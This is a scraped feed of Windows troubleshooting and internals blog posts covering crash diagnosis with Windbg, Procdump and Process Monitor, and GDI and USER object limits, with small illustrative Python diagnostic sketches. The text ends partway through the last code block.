The goal is to find the thread that has functions with the words <EM> fault </EM> , <EM> exception </EM> , or <EM> unhandled </EM> in their names. You can quickly do this by selecting each thread in the Processes and Threads window, pressing Enter, and then scanning the stack that appears in the Call Stack window. After doing this for the first few threads, I came across the thread I was looking for, revealed by functions all over its stack containing the telltale strings: </P> <BR /> <P> <IMG alt="image" border="0" height="284" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2703.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121230i6B6E88E4D783BBB9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Unfortunately, I was at an apparent dead end as far as fingering an add-on: all the DLLs shown in the call stack were Microsoft’s. 
There was one indicator that there might be an add-on hidden from view though, and that was the text reporting that Windbg couldn’t find symbols for at least some of the stack’s frames, so was forced to make guesses about the stack’s layout and was showing an address that didn’t lie within any DLL: </P> <BR /> <P> <IMG alt="image" border="0" height="83" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2781.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121231iE1F26EE92EF2ADCA" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="454" /> </P> <BR /> <P> This happens when a DLL uses <EM> frame pointer omitted </EM> (FPO) calling conventions, which in the absence of symbolic information for the DLL prevents the debugger from finding stack frames just by following the frame-pointer chain. The return addresses for the functions the thread invoked must be on the stack (unless they were overwritten by the bug that caused the crash), but Windbg’s heuristics couldn’t locate them. </P> <BR /> <P> There’s a Windbg command that you can use in these cases to hunt for the missing frame function addresses, the Display Words and Symbols command. If you’re debugging a 32-bit process, use the <EM> dds </EM> version of the command and if it’s a 64-bit process use <EM> dqs </EM> . You can also use <EM> dps </EM> (Display Pointer Symbols), which will interpret the function addresses as the appropriate size for a 32-bit or 64-bit process. The address to give to the command as the starting point should be the address of the stack frame immediately above the one where Windbg got lost. 
To see the address, click on the Addrs button in&nbsp;the call stack dialog: </P> <BR /> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3683.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121232iA8F47F5180064C0C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <BR /> <P> The address on the frame in question was 2cbc5c8: </P> <BR /> <P> <IMG alt="image" border="0" height="64" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4341.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121233i447DB7A4DC10F9F7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="354" /> </P> <BR /> <P> I passed it to dds as the argument and pressed Enter: </P> <BR /> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2781.image_5F00_thumb_5F00_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121234i478BE0A52991AE84" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> The first page of results didn’t list any functions besides the expected one, KiUserException. I hit the Enter key again without typing another command, because for address-based commands like dds, that tells Windbg to repeat the last command at the address where it left off. 
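</P> <BR /> <P> Conceptually, this kind of raw stack scan just walks memory one pointer-sized word at a time and reports every value that lands inside a loaded module. The Python sketch below models that idea only; it is not how Windbg is implemented. The module table, the stack contents, and the function name <EM> scan_stack </EM> are invented for illustration, and it prints module+offset rather than the nearest symbol that dds would show. </P>

```python
import struct
from bisect import bisect_right


def scan_stack(raw, start_addr, modules, word_size=4):
    """Find stack words that point into a loaded module.

    raw        -- bytes of stack memory that begin at start_addr
    modules    -- list of (base, size, name) tuples (hypothetical data)
    word_size  -- 4 for a 32-bit process (like dds), 8 for 64-bit (like dqs)

    Returns a list of (stack_address, value, "name+0xoffset") tuples.
    """
    fmt = "<I" if word_size == 4 else "<Q"  # little-endian pointer-sized word
    mods = sorted(modules)
    bases = [m[0] for m in mods]
    hits = []
    for off in range(0, len(raw) - word_size + 1, word_size):
        (value,) = struct.unpack_from(fmt, raw, off)
        i = bisect_right(bases, value) - 1  # last module starting at or below value
        if i >= 0:
            base, size, name = mods[i]
            if value < base + size:
                hits.append((start_addr + off, value, f"{name}+0x{value - base:x}"))
    return hits


if __name__ == "__main__":
    # Made-up module ranges and stack words for demonstration only.
    modules = [(0x10000000, 0x20000, "addon"), (0x77000000, 0x100000, "ntdll")]
    raw = struct.pack("<4I", 0x00000000, 0x77001234, 0x02CBC600, 0x10001ABC)
    for addr, value, where in scan_stack(raw, 0x02CBC5C8, modules):
        print(f"{addr:08x}  {value:08x}  {where}")
```

<P> Words that are plain data or that point back into the stack itself are skipped, so an unfamiliar module name stands out in the output the same way it does when you page through dds results. </P> <BR /> <P>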
The second page of results yielded something more interesting, the name of a DLL I wasn’t familiar with: </P> <BR /> <P> <IMG alt="image" border="0" height="134" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0068.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121235iED0B40E1C56C107D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> An easy way to see version information for a module without leaving Windbg is to use the <EM> lm </EM> (List Modules) command. The output of that command told me that Yt.dll (the name of the DLL is the text to the left of the “!”) was part of the Yahoo Toolbar: </P> <BR /> <P> <IMG alt="image" border="0" height="266" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6013.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121236i7E71EE6811BCFC07" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> This came as a surprise because the system on which the crash occurred was my home gaming system, a computer that I’d only had for a few weeks. The only software I generally install on my gaming systems is Microsoft Office and games. I don’t use browser toolbars and if I did, I would obviously use the one from Bing, not Yahoo’s. Further, the date on the DLL showed that it was almost two years old. 
I’m pretty diligent about looking for opt-out checkboxes on software installers, so the likely explanation was that the toolbar had come onto my system piggybacking on the installation of one of the several video-card stress testing and temperature profiling tools I used while overclocking the system. I find the practice of forcing users to opt out annoying and not giving them a choice even more so, so I was pretty annoyed at this point. A quick trip to the Control Panel and a few minutes later, my system was free from the undesired and out-of-date toolbar. </P> <BR /> <P> Using a couple of handy troubleshooting techniques, in less than five minutes I had identified the probable cause of the crash I experienced, made my system more reliable, and probably even improved its performance. Case closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:04:25 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-crash/ba-p/723924 MarkRussinovich 2019-06-27T07:04:25Z The Case of the Printing Failure https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-printing-failure/ba-p/723911 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 12, 2010 </STRONG> <BR /> <P> The most interesting cases I receive are those that demonstrate a unique troubleshooting technique or uncover an interesting root cause. I recently received one that has both characteristics. The case opened when a systems administrator got a report from a user that they were unable to print from their computer. There was no visible reaction to clicking on a print dialog or menu item, where normally they saw a dialog stating that the document had been sent to the printer and a tray icon representing the active print queue. </P> <P> The first thing the administrator did was to scan the event logs of the user’s machine, looking for any printing-related events. 
He quickly came upon two that correlated with the user’s most recent printing attempt: </P> <TABLE border="0" cellpadding="2" cellspacing="0" width="550"> <TBODY> <TR> <TD valign="top" width="275"> <IMG alt="image" border="0" height="168" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121219i57C214EB4F9294E9" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="278" /> </TD> <TD valign="top" width="275"> <IMG alt="image" border="0" height="192" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121220iEDEC724A86192CF8" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="278" /> </TD> </TR> </TBODY> </TABLE> <P> </P> <P> </P> <P> </P> <P> It appeared that the Spooler Service started when the user tried to print, but terminated, apparently with an exception (unexpectedly), about a minute later. The question was why? </P> <P> The administrator turned to <A href="#" target="_blank"> Sysinternals Procdump </A> . Procdump is a utility that generates crash dump files of a process when triggers you specify occur. Implemented triggers include CPU usage, virtual memory usage, unhandled exceptions, and process termination. You can use the CPU usage trigger, for example, to capture the state of a process when it hits a short-lived CPU burst, allowing you to look into the process to see the reason for the spike. The administrator guessed that the stack trace of the terminating thread might provide a clue. 
</P> <P> He knew that he had some time to get Procdump running after the Spooler Service started, so he launched Notepad, tried to print, and then executed Procdump with the -e option and the name of the Spooler Service process (Spoolsv) to have Procdump wait until the service exited before writing the dump file. A few seconds later Procdump reported that it had completed the job and saved a dump file: </P> <P> <IMG alt="image" border="0" height="294" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121221i7FF0F03FBA6A2F0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> </P> <P> </P> <P> He opened the dump in Windbg and executed the ‘k’ command, which has Windbg dump the stack of the thread that caused the crash. The stack trace, which essentially lists a record of the function calls executed before the crash, showed that the process died in a sequence of calls that included several Ldr functions, including LdrpLoadDll: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121222i65A7C48BF66F6153" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> A web search revealed that <A href="#" target="_blank"> LdrpLoadDll </A> is a function related to the system’s DLL loader. 
Suspecting that the process was dying either because it couldn’t find a DLL it was looking for or was loading an incorrect DLL, he turned to <A href="#" target="_blank"> Process Monitor </A> , which would enable him to see the process’s DLL-related file system activity. He started Process Monitor, attempted to print again, and then stopped the capture. Working his way from the end of the trace back to the beginning, he scanned for hints of the root cause. Shortly before Spoolsv exited, he saw it searching unsuccessfully for Localspl.dll in various directories on the system: </P> <P> <IMG alt="image" border="0" height="208" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121223i3356127E5DDFD908" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> He assumed that the DLL was supposed to be there. When he looked at another identically configured Windows XP system on his network, he found Localspl.dll in the \Windows\System32 directory, but not on the system experiencing the problem: </P> <P> <IMG alt="image" border="0" height="160" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_C074/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121224i070B86BEAEF8B46E" style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" width="311" /> </P> <P> The file’s description reported it to be the Local Spooler DLL, which explained the Spooler’s inability to support printing operations. After he copied the file from the working system, he was able to print successfully. 
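</P> <P> The pattern in the Process Monitor trace, one failed probe per directory until the search gives up, is easy to model. The Python sketch below is only an illustration of that probe-each-directory behavior: the function name <EM> find_in_search_path </EM> is hypothetical, the caller supplies the directory list, and it does not reproduce the actual search order the Windows loader uses. </P>

```python
import os


def find_in_search_path(file_name, directories):
    """Probe each directory in order for file_name.

    Returns (found_path_or_None, probed_paths). The list of probed paths
    is comparable to the series of lookups a file system trace would
    show for a DLL search. The directory list is supplied by the caller;
    this sketch does not model the real loader search order.
    """
    probed = []
    for directory in directories:
        candidate = os.path.join(directory, file_name)
        probed.append(candidate)
        if os.path.isfile(candidate):
            return candidate, probed
    return None, probed


if __name__ == "__main__":
    # Example directories only; adjust for the system being checked.
    dirs = [r"C:\Windows\System32", r"C:\Windows"]
    found, probed = find_in_search_path("localspl.dll", dirs)
    for path in probed:
        print("probed:", path)
    print("result:", found if found else "NOT FOUND")
```

<P> Running the same check against a working system and a failing one gives a quick comparison of where a file is expected to be, which is essentially what the administrator did by hand. </P> <P>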
</P> <P> As far as the user was concerned, the case was closed and he was able to get back to work, but the administrator was left with the question of what had happened to the original DLL. Another web search turned up forum posts from others that had experienced the same problem. <A href="#" target="_blank"> One post in particular </A> described the exact symptoms he’d seen, including the event log entries, suggested the same fix of copying Localspl.dll from another system, and blamed uninstallers of third-party print and fax software for incorrectly deleting Localspl.dll: </P> <P> <IMG alt="image" border="0" height="302" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePrintingFailure_A91F/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121225iB3450BAE0053D6E8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> He couldn’t say for certain that was the case for this particular system because the end user didn’t remember uninstalling printing or fax software, but the post had at least given him a plausible theory to replace the unease he would have been left with that files were mysteriously being deleted from his systems. He could now close the case thanks to Procdump and Process Monitor. </P> <P> If you solve an interesting case with Sysinternals tools, please send me screenshots (.PNG preferred) and log files so that I can share them with others in this blog and my presentations. 
</P> </BODY></HTML> Thu, 27 Jun 2019 07:03:05 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-printing-failure/ba-p/723911 MarkRussinovich 2019-06-27T07:03:05Z Pushing the Limits of Windows: USER and GDI Objects – Part 2 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-2/ba-p/723897 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 31, 2010 </STRONG> <BR /> <P> <A href="#" target="_blank"> Last time </A> , I covered the limits and how to measure usage of one of the two key window manager resources, USER objects. This time, I’m going to cover the other key resource, GDI objects. As always, I recommend you read the previous posts before this one, because some of the limits related to USER and GDI resources are based on limits I’ve covered. Here’s a full index of my other Pushing the Limits of Windows posts: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> </BLOCKQUOTE> <H5> GDI Objects </H5> <P> <A href="#" target="_blank"> GDI objects </A> represent graphical device interface resources like fonts, bitmaps, brushes, pens, and device contexts (drawing surfaces). 
As it does for USER objects, the window manager limits processes to at most 10,000 GDI objects, which you can verify with Testlimit using the –g switch: </P> <P> <IMG alt="image" border="0" height="115" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_20.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121205iF8F6F0E8C3EEAF91" title="image" width="454" /> </P> <P> You can look at an individual process’s GDI object usage on the Performance page of its Process Explorer process properties dialog and add the GDI Objects column to Process Explorer to watch GDI object usage across processes: </P> <P> <IMG alt="image" border="0" height="225" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_47.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121206i74FD225EF92D779A" title="image" width="264" /> </P> <P> Also like USER objects, 16-bit interoperability means that GDI objects have 16-bit identifiers, limiting them to 65,535 per session. Here’s the desktop as it appeared when Testlimit hit that limit on a Windows Vista 64-bit system: </P> <P> <IMG alt="image" border="0" height="439" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121207iD54F282D157E504B" title="image" width="554" /> </P> <P> Note that the Start button is on the bottom left where it belongs, but the rest of the task bar is at the top of the screen. The desktop has turned black and the sidebar has lost most of its color. Your mileage may vary, but you can see that bizarre things start to happen, potentially making it impossible to interact with the desktop in a reliable way. 
Here’s what the display switched to when I pressed the Start button: </P> <P> <IMG alt="image" border="0" height="439" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121208i7C4F8C4C2ACA535F" title="image" width="554" /> </P> <P> Unlike USER objects, GDI objects aren’t allocated from desktop heaps; instead, on Windows XP and Windows Server 2003 systems that don’t have Terminal Services installed, they allocate from general paged pool; on all other systems they allocate from per-session session pool. </P> <P> The kernel debugger’s “!vm 4” command dumps general virtual memory information, including session information at the end of the output. On a Windows XP system it shows that session paged pool is unused: </P> <P> <IMG alt="image" border="0" height="207" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_29.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121209i91697D31F950177F" title="image" width="432" /> </P> <P> On a Windows Server 2003 system without Terminal Services, the output is similar: </P> <P> <IMG alt="image" border="0" height="143" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_31.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121210i0BC05ABD443C4024" title="image" width="410" /> </P> <P> The GDI object memory limit on these systems is therefore the paged pool limit, as described in my previous post, <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> . 
However, when Terminal Services are installed on the same Windows Server 2003 system, you can see from the non-zero session pool usage that GDI objects come from session pool: </P> <P> <IMG alt="image" border="0" height="231" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_32.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121211i3E6B3EF0C3C19089" title="image" width="397" /> </P> <P> The !vm 4 command in the above output also shows the session paged pool maximum and session pool sizes, but the session paged pool maximum and session space sizes don’t display on Windows Vista and higher because they are variable. Session paged pool usage on those systems is capped by either the amount of address space it can grow to or the System Commit Limit, whichever is smaller. Here’s the output of the command on a Windows 7 system showing the current session paged pool usage by session: </P> <P> <IMG alt="image" border="0" height="289" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_33.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121212i61ED3348529865A4" title="image" width="376" /> </P> <P> As you’d expect, the main interactive session, Session 1, is consuming the most session paged pool. </P> <P> You can use the Testlimit tool with the “–g 0” switch to see what happens when the storage used for GDI objects is exhausted. The number you specify after the –g is the size of the GDI bitmap objects Testlimit allocates, but a size of 0 has Testlimit simply try and allocate the largest objects possible. 
Here’s the result on a 32-bit Windows XP system: </P> <P> <IMG alt="image" border="0" height="113" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_38.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121213i20A46A1955D2DA71" title="image" width="477" /> </P> <P> On a Windows XP or Windows Server 2003 system that doesn’t have Terminal Services installed, you can use the Poolmon utility from the Windows Driver Kit (WDK) to see the GDI object allocations by their pool tag. The output of Poolmon while Testlimit was exhausting paged pool on the Windows XP system looks like this when sorted by bytes allocated (type ‘b’ in the Poolmon display to sort by bytes allocated), by inference indicating that Gh05 is the tag for bitmap objects on Windows Server 2003: </P> <P> <IMG alt="image" border="0" height="158" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_37.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121214i3AF87E97D538B57B" title="image" width="554" /> </P> <P> On a Windows Server 2003 system with Terminal Services installed, and on Windows Vista and higher, you have to use Poolmon with the /s switch to specify which session you want to view. Here’s Testlimit executed on a Windows Server 2003 system that has Terminal Services installed: </P> <P> <IMG alt="image" border="0" height="125" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_35.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121215i2F7380C950EEA265" title="image" width="472" /> </P> <P> The command “poolmon /s1” shows the tags that contribute the largest allocations for Session 1. 
You can see the Gh15 tag at the top, showing that a different pool tag is being used for bitmap allocations: </P> <P> <IMG alt="image" border="0" height="148" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_44.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121216iB3FB6E7D8E887742" title="image" width="554" /> </P> <P> Note how Testlimit was able to allocate around 58 MB of bitmap data (that number doesn’t account for GDI’s internal overhead for a bitmap object) on the Windows XP system, but only 10 MB on the Windows Server 2003 system. The smaller number comes from the fact that session pool on the Windows Server 2003 Terminal Server system is only 32 MB, which is about the amount of memory Poolmon shows attributed to the Gh15 tag. The output of “!vm 4” confirms that session pool for Session 1 has been consumed and that subsequent attempts to allocate GDI objects from session pool have failed: </P> <P> <IMG alt="image" border="0" height="251" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_40.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121217i58EE730C741FE15D" title="image" width="421" /> </P> <P> You can also use the !poolused kernel debugger command to look at session pool usage. First, switch to the correct session by using the .process command with the /p switch and the address of a process object that’s connected to the session. To see what processes are running in a particular session, use the !sprocess command. 
Here’s the output of !poolused on the same Windows Server 2003 system, where the “c” option to !poolused has it sort the output by allocated bytes: </P> <P> <IMG alt="image" border="0" height="430" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsUSERandGDIObjec_85FB/image_thumb_45.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121218iA6BBDCEC0311243A" title="image" width="554" /> </P> <P> Unfortunately, there’s no public mapping between the window manager’s heap tags and the objects they represent, but the kernel debugger’s !poolused command uses the triage.ini file from the debugger’s installation directory to print more descriptive information about a tag. The command reports that Gh15 is GDITAG_HMGR_SPRITE_TYPE, which is only slightly more helpful, but others are clearer. </P> <P> Fortunately, most GDI and USER object issues are limited to a particular process hitting the per-process 10,000 object limit, so more advanced investigation to figure out what process is responsible for exhausting session pool or allocating GDI objects to exhaust paged pool is usually unnecessary. </P> <P> Next time I’ll take a look at System Page Table Entries (System PTEs), another key system resource that has limits that can be hit, especially on Remote Desktop sessions on Windows Server 2003 systems. 
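</P> <P> Because the per-process 10,000 object limit is the one most often hit, it can be handy to read a process’s GDI and USER object counts programmatically rather than through Process Explorer. The following is a minimal sketch, assuming the Win32 GetGuiResources function called through Python’s ctypes module; the helper names gui_object_counts and headroom are hypothetical, and on anything other than Windows the query simply returns None. </P>

```python
import ctypes
import sys

GR_GDIOBJECTS = 0    # GetGuiResources flag: count of GDI objects
GR_USEROBJECTS = 1   # GetGuiResources flag: count of USER objects
PER_PROCESS_LIMIT = 10_000  # per-process limit cited in the post


def gui_object_counts():
    """Return (gdi, user) object counts for this process, or None off Windows."""
    if sys.platform != "win32":
        return None
    from ctypes import wintypes
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    user32.GetGuiResources.argtypes = [wintypes.HANDLE, wintypes.DWORD]
    user32.GetGuiResources.restype = wintypes.DWORD
    process = kernel32.GetCurrentProcess()  # pseudo-handle, no CloseHandle needed
    gdi = user32.GetGuiResources(process, GR_GDIOBJECTS)
    user = user32.GetGuiResources(process, GR_USEROBJECTS)
    return gdi, user


def headroom(count, limit=PER_PROCESS_LIMIT):
    """Number of objects that can still be created before the limit is reached."""
    return max(limit - count, 0)


counts = gui_object_counts()
if counts is not None:
    gdi, user = counts
    print("GDI objects:", gdi, "headroom:", headroom(gdi))
    print("USER objects:", user, "headroom:", headroom(user))
```

<P> A process whose headroom keeps shrinking over time without a matching increase in visible windows or drawing activity is a likely candidate for a GDI or USER object leak. 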
</P> </BODY></HTML> Thu, 27 Jun 2019 07:02:14 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-2/ba-p/723897 MarkRussinovich 2019-06-27T07:02:14Z Pushing the Limits of Windows: USER and GDI Objects – Part 1 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-user-and-gdi-objects-8211-part-1/ba-p/723881 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 24, 2010 </STRONG> <BR /> <P> So far in the Pushing the Limits of Windows series, I’ve focused on resources managed by the Windows operating system kernel, including physical and virtual memory, paged and nonpaged pool, processes, threads and handles. In this and the next post, however, I will explore two resources managed by the Windows window manager, USER and GDI objects, that represent window elements (like windows and menus) and graphics constructs (like pens, brushes and drawing surfaces). Just like for the other resources I’ve discussed in previous posts, exhausting the various USER and GDI resource limits can lead to unpredictable behavior, including application failures and an unusable system. </P> <P> As always, I recommend you read the previous posts before this one, because some of the limits related to USER and GDI resources are based on limits I’ve covered. 
Here’s a full index of my other Pushing the Limits of Windows posts: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> </BLOCKQUOTE> <H5> Sessions, Window Stations and Desktops </H5> <P> There are a few concepts that make the relationship between USER objects, GDI objects, and the system clearer. The first is the session. A session represents an interactive user logon that has its own keyboard, mouse and display and represents both a security and resource boundary. </P> <P> The session concept was first introduced with Terminal Services (now called Remote Desktop Services) in Windows NT 4 Terminal Server Edition, where the physical display, keyboard and mouse concepts were virtualized for each user interactively logging on to a system remotely. Core Terminal Services functionality was then built into Windows 2000 Server. In Windows XP, sessions were leveraged to create the Fast User Switching (FUS) feature that allows you to switch between multiple interactive logins on the same physical display, keyboard and mouse. </P> <P> Thus, a session can be connected with the physical display and input devices attached to the system, connected with a logical display and input devices like the ones presented by a Remote Desktop client application, or be in a disconnected state, as happens when you switch away from a session with Fast User Switching or terminate a Remote Desktop client connection without logging off the session. 
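</P> <P> A program can check whether it is running in the session that is currently attached to the physical console. The following is a minimal sketch, assuming the Win32 ProcessIdToSessionId and WTSGetActiveConsoleSessionId functions called through Python’s ctypes module; the helper names session_info and on_physical_console are hypothetical, and off Windows the query returns None. </P>

```python
import ctypes
import os
import sys

# WTSGetActiveConsoleSessionId returns this value when no session
# is attached to the physical console.
NO_CONSOLE_SESSION = 0xFFFFFFFF


def session_info():
    """Return this process's session ID and the console session ID, or None off Windows."""
    if sys.platform != "win32":
        return None
    from ctypes import wintypes
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.ProcessIdToSessionId.argtypes = [
        wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    kernel32.ProcessIdToSessionId.restype = wintypes.BOOL
    kernel32.WTSGetActiveConsoleSessionId.restype = wintypes.DWORD
    session_id = wintypes.DWORD()
    if not kernel32.ProcessIdToSessionId(os.getpid(), ctypes.byref(session_id)):
        raise ctypes.WinError(ctypes.get_last_error())
    console_id = kernel32.WTSGetActiveConsoleSessionId()
    return {
        "session": session_id.value,
        "console_session": None if console_id == NO_CONSOLE_SESSION else console_id,
    }


def on_physical_console(info):
    """True when the process's session is the one attached to the physical console."""
    return info is not None and info["session"] == info["console_session"]


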